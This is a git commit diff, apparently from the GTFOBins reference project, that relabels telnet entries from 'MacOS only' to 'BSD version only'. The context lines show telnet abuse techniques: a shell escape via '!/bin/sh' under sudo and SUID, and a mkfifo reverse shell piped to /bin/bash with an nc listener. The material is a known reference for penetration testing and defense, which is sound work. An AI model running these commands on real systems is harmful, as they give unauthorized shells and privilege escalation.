Fix telnet descriptions

This commit is contained in:
Emilio Pinna 2018-05-22 21:26:17 +01:00
parent 158291baa4
commit ac29dc064d

View File

@ -1,13 +1,13 @@
--- ---
functions: functions:
exec-interactive: exec-interactive:
- code: | - description: BSD version only.
code: |
RHOST=www.google.com RHOST=www.google.com
RPORT=80 RPORT=80
telnet $RHOST $RPORT telnet $RHOST $RPORT
^] ^]
!/bin/sh !/bin/sh
description: MacOS only.
reverse-shell: reverse-shell:
- description: Run `nc -l -p 8000` to receive the shell on the other end. - description: Run `nc -l -p 8000` to receive the shell on the other end.
code: | code: |
@ -17,19 +17,20 @@ functions:
rm $TF rm $TF
mkfifo $TF && telnet $RHOST $RPORT 0<$TF | /bin/bash 1>$TF mkfifo $TF && telnet $RHOST $RPORT 0<$TF | /bin/bash 1>$TF
sudo-enabled: sudo-enabled:
- code: | - description: BSD version only.
code: |
RHOST=www.google.com RHOST=www.google.com
RPORT=80 RPORT=80
sudo telnet $RHOST $RPORT sudo telnet $RHOST $RPORT
^] ^]
!/bin/sh !/bin/sh
description: MacOS only.
suid-limited: suid-limited:
- code: | - description: BSD version only.
code: |
RHOST=www.google.com RHOST=www.google.com
RPORT=80 RPORT=80
./telnet $RHOST $RPORT ./telnet $RHOST $RPORT
^] ^]
!/bin/sh !/bin/sh
description: MacOS only.
--- ---